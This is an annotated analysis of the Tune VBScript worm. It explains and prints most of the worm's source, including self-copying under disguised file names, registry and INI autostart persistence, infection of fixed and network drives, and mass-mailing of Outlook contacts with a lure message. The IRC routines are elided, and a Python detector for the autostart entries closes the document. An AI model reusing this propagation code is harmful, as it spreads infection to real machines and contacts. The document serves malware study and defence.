
Tune.vbs

The Tune worm is written in VBScript. It first infects several local folders and sets itself to be run at boot. Tune then copies itself to all network and hard drives before harvesting addresses from Outlook and propagating via email. Finally, it modifies select IRC clients to send the worm to any person who joins the infected user's IRC channel.

Main script sub. The actual call to this sub is much further down in the code.

On Error Resume Next: Keep going if an error occurs. All Tune subs and functions begin with this.

Local Preservation: Copy self to local Windows, System, and temp folders.

Re-infection: Set worm to automatically reinfect local machine. Unless all copies of Tune are removed, machine will become completely reinfected next reboot.

    sub Tune()
      On Error Resume Next
      Dim obj, sysfldr,s, f
      Set obj = CreateObject("Scripting.FileSystemObject")
      Set sysfldr = obj.GetSpecialFolder(1)
      Set winfldr = obj.GetSpecialFolder(0)
      Set tmpfldr = obj.GetSpecialFolder(2)
      set s = CreateObject("Scripting.FileSystemObject")
      Set f = s.GetFile(WScript.ScriptFullName)
      f.copy(sysfldr&"\tune.vbs")
      f.copy(winfldr&"\tune.vbs")
      f.copy(tmpfldr&"\tune.vbs")
      f.copy(sysfldr&"\kernel.vbs")
      f.copy(winfldr&"\winsck.vbs")
      f.copy(sysfldr&"\explorer.vbs")
      loc=winfldr&"\tune.vbs"
      loc1=sysfldr&"\tune.vbs"
      loc2=tmpfldr&"\tune.vbs"
      loc3=sysfldr&"\kernel.vbs"
      loc4=winfldr&"\winsck.vbs"
      loc5="explorer.vbs"
      Set WSHShell = CreateObject("WScript.Shell")
      WSHShell.RegWrite "HKCU\Software\\Windows\CurrentVersion\Run\ScanRegistry", loc
      WSHShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\", loc1
      WSHShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\", loc2
      editini winfldr&"\win.ini","[windows]","load",loc3
      editini winfldr&"\win.ini","[windows]","run",loc4
      editini winfldr&"\system.ini","[boot]","shell","Explorer.exe " & loc5
      ntwrk()
    end sub

Start local network propagation

Find Connected Drives: Search possible drives A through Z. If a drive is fixed or a network drive, then infect that drive.

    sub ntwrk()
      On Error Resume Next
      for n = 65 to 90
        l=Chr(n)
        drv=l&":"
        d3=ShowDriveType(drv)
        if d3 = "Fixed" then infect(drv)
        if d3 = "Network" then infect(drv)
      next
      sprd()
    end sub

    Function ShowDriveType(drvpath)
      On Error Resume Next
      Dim fso, d, t
      Set fso = CreateObject("Scripting.FileSystemObject")
      Set d = fso.GetDrive(drvpath)
      Select Case d.DriveType
        Case 0: t = "Unknown"
        Case 1: t = "Removable"
        Case 2: t = "Fixed"
        Case 3: t = "Network"
        Case 4: t = "CD-ROM"
        Case 5: t = "RAM Disk"
      End Select
      if t = "" then t = "None"
      ShowDriveType = t
    End Function

Infect Drive: Infect a given drive by placing a copy of Tune into the root directory.

    sub infect(drive)
      On Error Resume Next
      set s = CreateObject("Scripting.FileSystemObject")
      Set f = s.GetFile(WScript.ScriptFullName)
      f.copy(drive & "\tune.vbs")
      path=drive&"\tune.vbs"
    end sub

Start email propagation

Email Propagation

Previously Infected? Check registry to see if emails have been sent before. If not, then proceed. Otherwise, skip to IRC propagation.

Access Outlook/

Send Tune via Email: Loop through all Outlook contacts, sending each of them an email with Tune attached.

Email Message: Subject uninformative while message is ambiguous regarding attachment.

    sub sprd()
      on error resume next
      Dim oShell
      Set oShell = Wscript.CreateObject("Wscript.Shell")
      Dim strProfile
      Dim strAlias, strAliasKey
      strProfile = oShell.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Sent?")
      if strProfile = "" then
        oShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Sent?", "1"
        Set Prg = CreateObject("Outlook.Application")
        Set Prg1 = Prg.GetNameSpace("MAPI")
        For y = 1 To Prg1.AddressLists.Count
          Set AdBook = Prg1.AddressLists(y)
          x = 1
          Set Maie = Prg.CreateItem(0)
          For oo = 1 To AdBook.AddressEntries.Count
            newmailadd = AdBook.AddressEntries(x)
            Maie.Recipients.Add newmailadd
            x = x + 1
          Next
          Maie.Subject = "Please Read"
          Maie.Body = "Hey, you really need to check out this attached file I sent you...please check it out as soon as possible."
          Maie.Attachments.Add WScript.ScriptFullName
          Maie.DeleteAfterSubmit = False
          Maie.Send
          newmailadd=""
        next
      else
      end if
      etc()
    end sub

Begin IRC Propagation

Check for IRC Clients: If mIRC or PIRCH is present, then infect the client.

    sub etc()
      On Error Resume Next
      a=ReportFolderStatus("C:\mirc")
      if a="1" then mirc()
      b=ReportFolderStatus("C:\pirch98")
      if b="1" then pirch9x()
    end sub

Verify Folder Existence: Check to see if a given folder exists.

    Function ReportFolderStatus(fldr)
      On Error Resume Next
      Dim fso, msg
      Set fso = CreateObject("Scripting.FileSystemObject")
      If (fso.FolderExists(fldr)) Then
        msg = "1"
      Else
        msg = "0"
      End If
      ReportFolderStatus = msg
    End Function

Main sub Call: Let the mischief begin.

    Tune()

Verify File Existence: Check to see if a given file exists. Interestingly, this function is never used in Tune.

    Function ReportFileStatus(filespec)
      On Error Resume Next
      Dim fso, msg
      Set fso = CreateObject("Scripting.FileSystemObject")
      If (fso.FileExists(filespec)) Then
        msg = "1"
      Else
        msg = "0"
      End If
      ReportFileStatus = msg
    End Function

Modify IRC Client Setup to Automatically Propagate Tune: The initialization files for mIRC or PIRCH (if available) are modified so that the client automatically sends Tune.vbs via DCC to anyone who joins the infected user's channel. Direct Client-to-Client (DCC) is a protocol allowing IRC users to communicate and share files independent of the IRC .

    sub pirch9x()
      ...
      (code removed for brevity)
      ...
    end sub

    sub mirc()
      ...
      (code removed for brevity)
      ...
    end sub

Edit Initialization File: Modify a file, placing a given value for the string in the specified section. Used in Tune() and mirc() subs.

Author's Signature: the 'Tune Virus By Slug comment.

    sub editini(filename,section,string,newvalue)
      ...
      ' (code removed for brevity)
      'Tune Virus By Slug
      ...
    end sub
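
A defender-side check for the autostart locations the Tune() sub writes to, added here as an example and not part of the original listing. It flags script files referenced from the win.ini load/run keys, the system.ini shell key, and exported Run/RunServices values; the function names and the sample INI and registry data are constructed for illustration.

```python
import re

# Script-host extensions that have no business in a legacy autostart entry.
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh)\b", re.I)
# (file, section, key) triples the listing passes to its editini sub.
INI_AUTOSTARTS = {("win.ini", "windows", "load"), ("win.ini", "windows", "run"),
                  ("system.ini", "boot", "shell")}

def parse_ini(text):
    """Yield (section, key, value); section and key are lower-cased for matching."""
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line:
            key, value = line.split("=", 1)
            yield section, key.strip().lower(), value.strip()

def audit_ini(name, text):
    """Return autostart INI entries in file `name` that reference a script file."""
    return [f"{name} [{section}] {key}={value}"
            for section, key, value in parse_ini(text)
            if (name.lower(), section, key) in INI_AUTOSTARTS and SCRIPT_EXT.search(value)]

def audit_run_values(values):
    """values: {registry value path: data} exported from Run / RunServices keys."""
    return [f"{path} -> {data}" for path, data in sorted(values.items())
            if SCRIPT_EXT.search(data)]

# Constructed sample data modelled on the listing; not taken from a real host.
WIN_INI = "[Windows]\nload=C:\\WINDOWS\\SYSTEM\\kernel.vbs\nRun=C:\\WINDOWS\\winsck.vbs\n[fonts]\n"
SYSTEM_INI = "[boot]\nshell=Explorer.exe explorer.vbs\nsystem.drv=system.drv\n"
CLEAN_INI = "[boot]\nshell=Explorer.exe\n"
RUN = {r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Default)": r"C:\WINDOWS\SYSTEM\tune.vbs",
       r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SystemTray": "SysTray.Exe"}

if __name__ == "__main__":
    hits = audit_ini("win.ini", WIN_INI) + audit_ini("system.ini", SYSTEM_INI)
    for hit in hits + audit_run_values(RUN):
        print("SUSPICIOUS:", hit)
```

Because every copy the worm drops can re-trigger the others at boot, a hit in any one of these locations means all of them, plus the drive roots, need to be checked before the next restart.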